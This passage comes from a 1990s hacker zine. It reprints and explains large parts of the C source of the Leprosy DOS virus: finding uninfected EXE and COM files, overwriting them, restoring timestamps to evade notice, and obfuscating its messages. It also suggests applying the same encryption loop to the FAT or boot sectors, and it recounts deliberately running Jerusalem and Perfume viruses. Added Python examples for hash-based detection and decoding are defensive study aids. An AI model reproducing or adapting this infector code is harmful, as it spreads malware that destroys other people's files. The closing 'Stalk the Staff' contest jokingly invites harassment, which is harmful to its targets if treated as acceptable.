    if ( success )                       /* If we got something this time, */
        print_s( fake_msg );             /* feed 'em the phony error line. */
    else
        if ( diseased_count > 6 )        /* If we found 6+ infected files */
            for( x = 0; x < 3; x++ )     /* along the way, laugh!! */
                print_s( virus_msg[x] );
        else
            print_s( fake_msg );         /* Otherwise, keep a low profile. */
    return;
}

void infect( void ) {
    _DX = (int) dta->filename;           /* DX register points to filename. */
    _CX = 0x00;                          /* No attribute flags are set. */
    _AL = 0x01;                          /* Use Set Attribute sub-function. */
    _AH = 0x43;                          /* Assure access to write file. */
    asm int 21H;                         /* Call DOS interrupt. */
    open_handle( dta->filename );        /* Re-open the healthy file. */
    _BX = handle;                        /* BX register holds handle. */
    _CX = virus_size;                    /* Number of bytes to write. */
    _DX = (int) codestart;               /* Write program code. */
    _AH = 0x40;                          /* Set up and call DOS. */
    asm int 21H;
    restore_timestamp();                 /* Keep original date & time. */
    close_handle();                      /* Close file. */
    return;
}

int find_healthy( void ) {
    if ( find_first("*.EXE") != NO_MATCH )    /* Find EXE? */
        if ( healthy() )                      /* If it's healthy, OK! */
            return 1;
        else
            while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */
                if ( healthy() )
                    return 1;                 /* If you find one, great! */
    if ( find_first("*.COM") != NO_MATCH )    /* Find COM? */
        if ( healthy() )                      /* If it's healthy, OK! */
            return 1;
        else
            while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */
                if ( healthy() )
                    return 1;                 /* If you find one, great! */
    return 0;                                 /* Otherwise, say so. */
}

int healthy( void ) {
    int i;

    datestamp = dta->datestamp;          /* Save time & date for later. */
    timestamp = dta->timestamp;
    open_handle( dta->filename );        /* Open last file located. */
    _BX = handle;                        /* BX holds current file handle. */
    _CX = 20;                            /* We only want a few bytes. */
    _DX = (int) compare_buf;             /* DX points to the scratch buffer. */
    _AH = 0x3f;                          /* Read in file for comparison. */
    asm int 21H;
    restore_timestamp();                 /* Keep original date & time. */
    close_handle();                      /* Close the file. */
    for ( i = 0; i < 20; i++ )           /* Compare to virus code. */
        if ( compare_buf[i] != *(codestart+i) )
            return 1;                    /* If no match, return healthy. */
    diseased_count++;                    /* Chalk up one more fucked file. */
    return 0;                            /* Otherwise, return infected. */
}

void restore_timestamp( void ) {
    _AL = 0x01;                          /* Keep original date & time. */
    _BX = handle;                        /* Same file handle. */
    _CX = timestamp;                     /* Get time & date from DTA. */
    _DX = datestamp;
    _AH = 0x57;                          /* Do DOS service. */
    asm int 21H;
    return;
}

void print_s( char *s ) {
    char *p = s;

    while ( *p ) {                       /* Subtract 10 from every character. */
        *p -= 10;
        p++;
    }
    _DX = (int) s;                       /* Set DX to point to adjusted string. */
    _AH = 0x09;                          /* Set DOS function number. */
    asm int 21H;                         /* Call DOS interrupt. */
    return;
}

int find_first( char *fn ) {
    _DX = (int) fn;                      /* Point DX to the file name. */
    _CX = 0xff;                          /* Search for all attributes. */
    _AH = 0x4e;                          /* 'Find first' DOS service. */
    asm int 21H;                         /* Go, DOS, go. */
    return _AX;                          /* Return possible error code. */
}

int find_next( void ) {
    _AH = 0x4f;                          /* 'Find next' function. */
    asm int 21H;                         /* Call DOS. */
    return _AX;                          /* Return any error code. */
}

void open_handle( char *fn ) {
    _DX = (int) fn;                      /* Point DX to the filename. */
    _AL = 0x02;                          /* Always open for both read & write. */
    _AH = 0x3d;                          /* "Open handle" service. */
    asm int 21H;                         /* Call DOS. */
    handle = _AX;                        /* Assume handle returned OK. */
    return;
}

void close_handle( void ) {
    _BX = handle;                        /* Load BX register w/current file handle. */
    _AH = 0x3e;                          /* Set up and call DOS service. */
    asm int 21H;
    return;
}
-----------------------------------------------------------------------------
For the source code discussed in this text file, the main areas covered will
be encryption techniques, how the virus infects files, how viruses 'replicate'
and 'breed', and how 'stealth techniques' are implemented in the code.
In this case we will cover how the virus infects files and how it encrypts
its strings.
-----------------------------------------------------------------------------
Infection Method:
-----------------------------------------------------------------------------
void infect( void ) {
    _DX = (int) dta->filename;           /* DX register points to filename. */
    _CX = 0x00;                          /* No attribute flags are set. */
    _AL = 0x01;                          /* Use Set Attribute sub-function. */
    _AH = 0x43;                          /* Assure access to write file. */
    asm int 21H;                         /* Call DOS interrupt. */
    open_handle( dta->filename );        /* Re-open the healthy file. */
    _BX = handle;                        /* BX register holds handle. */
    _CX = virus_size;                    /* Number of bytes to write. */
    _DX = (int) codestart;               /* Write program code. */
    _AH = 0x40;                          /* Set up and call DOS. */
    asm int 21H;
    restore_timestamp();                 /* Keep original date & time. */
    close_handle();                      /* Close file. */
    return;
}
-----------------------------------------------------------------------------
void infect( void ) is just what he named this function.
The function returns nothing and is called with no parameters, as the two
"voids" suggest.
Register DX points to the filename, as declared in the structure "_dta":
-----------------------------------------------------------------------------
_dta structure:
-----------------------------------------------------------------------------
struct _dta
{
    char findnext[21];
    char attribute;
    int  timestamp;
    int  datestamp;
    long filesize;
    char filename[13];
} *dta = (struct _dta *) 0x80;
-----------------------------------------------------------------------------
Next in the "infect" function, 0x00 is assigned to the CX register.
With DOS function 43H, register CX holds the attribute bits you want to set
on the file:
Bit:    Attribute:
0       Read Only
1       Hidden
2       System
3-4     Reserved
5       Archive
6-15    Reserved
Because the author assigned 0x00 to CX, none of the above attributes are set
on the file, allowing it to be written to.
Next in the "infect" function, 0x01 is assigned to register AL:
0x01 tells DOS we want to SET attributes.
Following that, 0x43 is assigned to AH,
which tells DOS we want function 43H (Get/Set Attributes).
The current handle is assigned to register BX.
The size of the virus code, or the number of bytes to write, stored in the
integer "virus_size", is assigned to register CX.
virus_size is declared and initialised at the beginning of the source code
as an integer with the value "666".
Then the virus code is written to the file (function 40H), the original date
and time the file had are restored, and the file is closed.
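Because infect() writes the virus over the start of the file and restore_timestamp()
puts the original date and time back, checking timestamps will not reveal the change,
and neither will file size when the target is larger than 666 bytes; a content hash
will. The following Python example is added here and is not from the article or the
Leprosy source: it baselines the executables in a directory and re-checks them after a
constructed stand-in for the overwrite-then-restore-timestamp sequence (the file names
EDLIN.EXE and SYS.COM are borrowed from the article's table as constructed samples).

```python
"""Baseline integrity check for executables: an overwriting infector that
restores the original timestamp (as Leprosy's restore_timestamp() does)
still changes the file's hash. Added example; names and data are constructed."""
import hashlib
import os
import tempfile

EXECUTABLE_EXTS = (".exe", ".com")


def hash_file(path):
    """SHA-256 of a file's contents, read in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(directory):
    """Record (mtime_ns, size, sha256) for each executable in directory."""
    baseline = {}
    for name in sorted(os.listdir(directory)):
        if name.lower().endswith(EXECUTABLE_EXTS):
            path = os.path.join(directory, name)
            st = os.stat(path)
            baseline[name] = (st.st_mtime_ns, st.st_size, hash_file(path))
    return baseline


def check_baseline(directory, baseline):
    """Return {name: [changed fields]} for files that differ from the baseline.
    Fields are checked in the order a quick check would try them: mtime, size, hash."""
    findings = {}
    for name, (mtime_ns, size, digest) in baseline.items():
        path = os.path.join(directory, name)
        st = os.stat(path)
        changed = []
        if st.st_mtime_ns != mtime_ns:
            changed.append("mtime")
        if st.st_size != size:
            changed.append("size")
        if hash_file(path) != digest:
            changed.append("hash")
        if changed:
            findings[name] = changed
    return findings


def overwrite_keeping_timestamp(path, payload):
    """Constructed stand-in for infect() + restore_timestamp(): write payload
    over the start of the file in place, then put the original times back.
    Like Leprosy, this does not truncate, so a larger file keeps its size."""
    st = os.stat(path)
    with open(path, "r+b") as f:
        f.write(payload)
    os.utime(path, ns=(st.st_atime_ns, st.st_mtime_ns))


def demo():
    """Two constructed 'executables'; SYS.COM gets its first 666 bytes replaced."""
    with tempfile.TemporaryDirectory() as workdir:
        samples = {"EDLIN.EXE": b"MZ" + bytes(2000), "SYS.COM": b"\xe9" + bytes(1500)}
        for name, body in samples.items():
            with open(os.path.join(workdir, name), "wb") as f:
                f.write(body)
        baseline = build_baseline(workdir)
        overwrite_keeping_timestamp(os.path.join(workdir, "SYS.COM"), b"V" * 666)
        return check_baseline(workdir, baseline)


if __name__ == "__main__":
    print(demo())   # {'SYS.COM': ['hash']}: timestamp and size look untouched
```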
-----------------------------------------------------------------------------
The Method Of Encryption:
-----------------------------------------------------------------------------
void print_s( char *s ) {
    char *p = s;

    while ( *p ) {                       /* Subtract 10 from every character. */
        *p -= 10;
        p++;
    }
    _DX = (int) s;                       /* Set DX to point to adjusted string. */
    _AH = 0x09;                          /* Set DOS function number. */
    asm int 21H;                         /* Call DOS interrupt. */
    return;
}
-----------------------------------------------------------------------------
The above function used in "Leprosy", called "print_s" accepts one parameter,
a string of text, like these ones defined at the beginning of the Leprosy
source code:
-----------------------------------------------------------------------------
char *virus_msg[3] =
{
    CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.",
    CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.",
    CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14."
};
-----------------------------------------------------------------------------
Note: CRLF is defined as "\x17\x14" at the beginning of the source: \x17 is
the encoded form of a carriage return (0x0D plus 10) and \x14 the encoded form
of a line feed (0x0A plus 10); print_s subtracts 10 to recover them.
-----------------------------------------------------------------------------
When a string is passed to the "print_s" function, it is un-encrypted in place
before being printed, so
print_s(virus_msg[0]);
print_s(virus_msg[1]);
print_s(virus_msg[2]);
would result in the following being printed to the screen:
------------------------------------------------------------
NEWS FLASH!! Your system has been infected with the
incurable decay of LEPROSY 1.00, a virus invented by
PCM2 in June of 1990. Good luck!
-----------------------------------------------------------
The compiler I currently use does not accept inline assembly
code as the author of Leprosy had in his source, so I modified
the "print_s" function so I could compile it:
For those interested, I use Microsoft Quick C (C) Microsoft
-----------------------------------------------------------
/* NOTE: I removed the . from the end of each message because that is */
/* a $ when un-encrypted, and the $ to terminate the string is only   */
/* required for the assembly version of the "print_s" function.       */
/* Also: The hexadecimal constants in the strings are as follows:     */
/* \x13 = TAB, \x7f = u, \x83 = y, \x81 = w, \x80 = v                  */
#include <stdio.h>

#define CRLF "\x17\x14"

/* Writable arrays rather than pointers to string literals: print_s
   modifies the text in place, and string literals may be read-only. */
char virus_msg[3][80] =
{
    CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro",
    CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83",
    CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14"
};

void print_s (char *s);

int main (void)
{
    print_s(virus_msg[0]);
    print_s(virus_msg[1]);
    print_s(virus_msg[2]);
    return 0;
}

/* Subtract 10 from every character, then print the decoded string. */
void print_s (char *s) {
    char *p = s;
    while ( *p ) {
        *p -= 10;
        p++;
    }
    printf("%s\n",s);
}
-----------------------------------------------------------------------------
*p -= 10; is what does it all. It subtracts 10 from each character, and the
same loop can be used either way, to un-encrypt or to encrypt.
If you change it to: *p += 10;
it will then encrypt.
You can also change it to:
*p -= rand() % 35000;   /* #include <stdlib.h> for "rand()" */
and it will change the value it uses to encrypt or un-encrypt every time it
passes through the "while" loop, or you can change it to any value you like.
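An analyst looking at a sample that hides its strings this way does not know
the constant in advance. The following Python example is added here and is
not part of Kleptic's article or the Leprosy source: it tries every single-byte
additive key (which covers "+= n" as well as "-= n", since subtracting n is
the same as adding 256-n on 8-bit chars) and keeps the key that gives the most
readable text, using the three Leprosy strings above as its input.

```python
"""Brute-force the single-byte 'subtract a constant' string obfuscation that
Leprosy's print_s() undoes with *p -= 10. Added example; not from the article."""
import string

# Whitespace plus printable ASCII: what a recovered message should consist of.
PLAINTEXT_BYTES = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}
TEXTY = set(bytes(string.ascii_letters + " ", "ascii"))

# The three virus_msg strings from the Leprosy source, with CRLF ("\x17\x14")
# prepended as the source does, stored here as bytes for analysis.
CRLF = b"\x17\x14"
LEPROSY_MSG = [
    CRLF + b"\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro",
    CRLF + b"\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83",
    CRLF + b"\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14",
]


def shift_decode(blob, key):
    """Apply '*p -= key' to every byte, wrapping at 256 like an 8-bit char."""
    return bytes((b - key) & 0xFF for b in blob)


def readability(candidate):
    """Score a candidate plaintext: printable fraction first, then how many
    bytes are letters or spaces (breaks ties between all-printable keys)."""
    printable = sum(b in PLAINTEXT_BYTES for b in candidate)
    texty = sum(b in TEXTY for b in candidate)
    return (printable / len(candidate), texty)


def best_shift(blob):
    """Try all 256 keys on blob; return (key, decoded) for the most readable one."""
    key = max(range(256), key=lambda k: readability(shift_decode(blob, k)))
    return key, shift_decode(blob, key)


def recover_messages(blobs):
    """Recover each message independently and report the key found for each,
    so an analyst can see whether one constant was used throughout."""
    return [best_shift(b) for b in blobs]


if __name__ == "__main__":
    for key, text in recover_messages(LEPROSY_MSG):
        print(key, text.decode("ascii").strip())   # key 10 for all three
```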
-----------------------------------------------------------------------------
This method of encryption can be used to encrypt files, file allocation
tables, boot sectors, etc. All you need is a function that reads and writes
any of the three. For instance, read the contents of the File Allocation
Table, pass the string(s) through the print_s function and then write
the encrypted string(s) back to the File Allocation Table. I don't suggest
doing this to your hard drive, or anyone else's, for it will result in either
you or the other person having to crack the encryption and restore the FAT
manually, or formatting the hard drive and replacing all the files. If you
want to experiment, do it on a floppy, like I did.
-----------------------------------------------------------------------------
The "uncompress" virus
-----------------------------------------------------------------------------
According to the person who uploaded it to the BBS where I got it from, this
virus infects when you uncompress the file.
I did not find any indication of this when I uncompressed the file, called
NJERU.ARJ. It is an Arkanoid II: Revenge Of Doh crack released by FiRM that
is infected with a strain of Jerusalem-4.
I ran it and Norton Anti Virus (C) Symantec reported the virus in memory.
I then proceeded to run EDLIN.EXE (C) Microsoft, SYS.COM (C) Microsoft,
COMMAND.COM (C) Microsoft, and ARJ.EXE (C) Robert K. Jung to see what would
happen. These are the results:
Filename:     Original Size:     Size After Infection:
EDLIN.EXE     14,121 bytes       15,936 bytes
ARJ.EXE       98,968 bytes       100,784 bytes
SYS.COM       13,440 bytes       15,253 bytes
There were no size changes to COMMAND.COM, nor was it infected.
A file was also created by the virus called "NJVR._OO" that was around 26K
but only had one line in it, an error message concerning the media of the disk.
Sorry, the exact size of the file NVJR._OO and the exact message are not
available. When I attempted to remove the apparent text file using the
MS-DOS "DEL" command, it displayed the error message and tried to write to
drive A which was write protected at the time. Then it went back to drive B
and apparently did damage to the media. I formatted the disk and it was fine
afterwards. I have never seen anything like this before, a text file being
able to do damage just by attempting to delete it. I guess it wasn't a text
file after all but I still have no idea how it managed to corrupt the media
on drive B. It also created a file called "N" which was 0 bytes and couldn't
be deleted or read by Norton Anti Virus.
-----------------------------------------------------------------------------
"Suicidal Tendencies" Department.
(Appropriately named department: I can't believe I am deliberately running
a virus on my system)
This section of the newsletter will cover what happened when I ran a virus
on a floppy with MSDOS.SYS, IO.SYS, COMMAND.COM, an overlay file, a .EXE file
and a few other assorted files on it.
The virus of the month award goes to: The Perfume Virus
-----------------------------------------------------------------------------
What Happened:
-----------------------------------------------------------------------------
Filename: PERFUME.COM Filesize: 806 bytes
Ok, I placed this file on drive B with the following files:
Filename:         Original Size:
----------------------------------
COMMAND.COM       47845
MSDOS.SYS         37394
IO.SYS            33430
ANSI.SYS           9029
RAMDRIVE.SYS       5873
CONFIG.SYS           39
UNDELETE.EXE      13924
AUTOEXEC.BAT         69
15ALL05.DEF       67278
MICHEL.DEF          456
NSETUP.OVL          876
PKUNZIP.EXE       23528
----------------------------------
When I ran PERFUME.COM, it displayed the message: This is a tiny COM program.
and it infected COMMAND.COM, enlarging it by 765 bytes to 48,610 bytes.
It then proceeded to remove the hidden/system attribute from MSDOS.SYS but
didn't infect it and then attempted to infect the disk in drive A, which was
write protected at the time. The virus, realizing it couldn't write to drive
A, displayed the message:
Not ready reading drive A
Insert disk with \COMMAND.COM in drive A
Press any key to continue . . .
Now, usually when DOS displays that message, it only needs to READ, and still
could've if the disk was write protected, so evidently the virus was
trying to outsmart me and fool me into thinking that was a DOS message so it
could infect at least one more disk.
I ran Norton Anti Virus v2.0 (C) Symantec, and it reported Perfume in memory,
so I re-booted and ran NAV again. This time it didn't report the virus being
in memory, but did identify COMMAND.COM and PERFUME.COM as being infected.
Also:
In my search for the virus of the month, I came across a file called
"ISRAELI.ZIP" which I thought to be a virus called "Israeli" but as it turns
out it was a strain of Jerusalem-4, the same as the supposed "Uncompress
virus" discussed earlier. The file was called: SORTINFT.EXE and was 3760
bytes. When I ran it, it did no damage to the disk or files but NAV did
report Jerusalem-4 in memory so I re-booted. I then ran NAV again and when
the screen came up saying who the copy of NAV was registered to, it said:
Registered To:
Kracked Phile <tm>
Weird eh? And that's not all, I went to scan memory, and the little window
came up that it displays the name of the current virus being scanned for, but
that's it, no names were displayed. The program appeared to freeze up, and
the disk kept spinning with the drive light on. I re-booted once again and
ran NAV again. The weird letters were still there but it scanned memory no
problem this time. I exited NAV and went to drive B to delete files
when I noticed a file called: NRVN E._OO that was 4096 bytes long. Since when
does DOS allow spaces in filenames? As a result I couldn't view it or delete
it by typing: C>DEL NRVN E._OO so I typed: C>DEL *._OO and that worked. At
one point a message also came up on the screen: "File Allocation Table Bad,
Drive B". I imagine Jerusalem-4 was responsible for the weird file name and
the bad FAT on drive B. I have no idea why NAV was acting funny, possibly
a genuine disk error and not due to a virus, since the disk was always write
protected.
-----------------------------------------------------------------------------
Well, that's it for "Suicidal Tendencies" for this month!
I don't recommend trying this on any computer with a hard drive. I do not have
a hard drive on the machine I do my experimenting on, so if I am careful and
keep the virus isolated to one disk, I have nothing to worry about.
-----------------------------------------------------------------------------
Anti Viral Software:
-----------------------------------------------------------------------------
Here are some nice virus scanners/anti viral programs to check out:
-----------------------------------------------------------------------------
Scan v89b (C) McAfee - available on most Public Domain BBSes
Clean v89b (C) McAfee - available on most Public Domain BBSes
Norton Anti Virus v2.0 (C) Symantec
Central Point Anti Virus (C) Central Point Software
There are a few others, but I think the above four are the best. I use
Norton Anti Virus and Scan.
-----------------------------------------------------------------------------
Some things you should know:
-----------------------------------------------------------------------------
Most people assume that a hard drive in a newly purchased computer, or a new
program still in the shrinkwrap, is always virus free. Well, this is just not
true. The reported cases are few and far between, but today anything can
happen, and it has. A certain computer company shipped out 500 of their
computers infected with the Michelangelo virus, which started the whole
panic in the first place. And there have been a few times where someone bought
a brand new program, took it home and started using it, not expecting it to
be infected with a virus. Well, it was. After all, people create virii and
people work at computer companies, and software distributors. So what's
stopping a pissed off employee from infecting a computer or a program? Nothing
at all.
How you take this information is entirely up to you.
If you call a BBS and they say they scan for virii, don't assume that every
single file will be virus free; some can sneak through. There is also the
possibility of an unknown virus that was not detected by the scanner.
Last but not least: ALWAYS BACK UP YOUR DATA!!!
Philosophy Dept:
"Knowledge is power" - Francis Bacon, 16th Century Philosopher
"Even if a computer is locked, sealed in concrete, placed in a lead room and
surrounded by armed guards, I'd still have my doubts."
Those aren't the exact words and I forget who said that, but it is quite
appropriate and all too true.
I hope you enjoyed this issue of "Viriisearch" The newsletter dedicated
entirely to computer virii.
Until Next Time......Be Careful!!!
-= Kleptic =-
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98
::: The Discordant Opposition Journal ::: Issue 0 - File 10:::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Conclusion:
We've picked ourselves up off the ground and dusted ourselves off,
the next issue is already shaping up well, we'll be unveiling the
results of our insane competitions. Details of new sections will be
in the next issue as well as various other exciting things. These
will include a Review of the upcoming Mitnick Movie - 'TakeDown',
'Eluding Unix Authentication' and an interview with other notorious
underground figures.
Now, announcing two DoJ competitions, 'Cheesy ASCII Art' and
'Stalk the Staff'. The ASCII Art competition was inspired by Rue
asking his friend bedlam if he wanted to do a little ASCII map
for people going to the Dublin 2600 meeting (the answer is
unprintable). For the Art competition we're looking for dodgy
art of a purely ASCII nature, self portraits, maps, sexual
innuendo, anything remotely ASCII like really. The best selection
(or anything we get if it comes down to it) will be published in
either next issue or at our convenience. The winner receives a
free lifetime subscription to the DoJ and the respect and admiration
of everyone for his elite ASCII skillz. Send your ASCII submissions
to ascii@Rue-the-Day.net and we'll laugh hideously at your vague
attempts...
'Stalk the Staff' is inspired by various people we
know and the maniacs who shamelessly harass them online (and from
personal experiences of one of the editors). By the way, we mean
'maniacs' in the nicest possible way. For the stalking competition
we're basically looking for all you people out there that get off
on disturbing minor underground celebrities, like ourselves, to
send us emails of your insane (inane?) rants and raves. We're also
looking for amusing stalker stories from anyone who has them. If
you really want to send decapitated soft toys with 'Rue' written
on them or whatever then take a photo instead as we aren't big into
snail mail. All submissions welcomed, get stalking people! Send the
submissions to stalkers@Rue-the-Day.net and you'll never hear from
us again...
Well, there you have it. The first issue of The DoJ. Be sure
to look out for future issues as they are on their way. But
to make sure we get there, we need your help. Fiction, articles,
poetry, stories, fact, rumour, advice and even letters will
all help get the next issue out. Rue and myself wrote a lot for
this issue, but in the future we hope to be able to leave most
of it in your hands. Submit anything remotely underground that
you might have. Underground instructions, warning, tales or
whatever else you have.
This issue wouldn't have been possible without the help of
ethercat for the site, rOTTEN for the art, Digital Avatar and
Kleptic for their submissions. Thank you and also if you have
an underground site or newsletter worth a mention then contact
us. You can mail the DoJ at discordia@Rue-the-Day.net and we
will reply as soon as possible.
Nothing more really to be said, hope you enjoyed Issue 0 and
got something from it. Preferably not contagious. The following
cultural content helped inspire us; The Dead Kennedys, Placebo,
Scraping Foetus off The Wheel, A Tribe Called Quest, The Smashing
Pumpkins, La Haine, Albino Alligator and Things to Do in Denver
When You're Dead.
Thanks and cya next time...
And remember not to eat those big white mints !
Hail Discordia !
Cronus and Rue-the-Day
Editors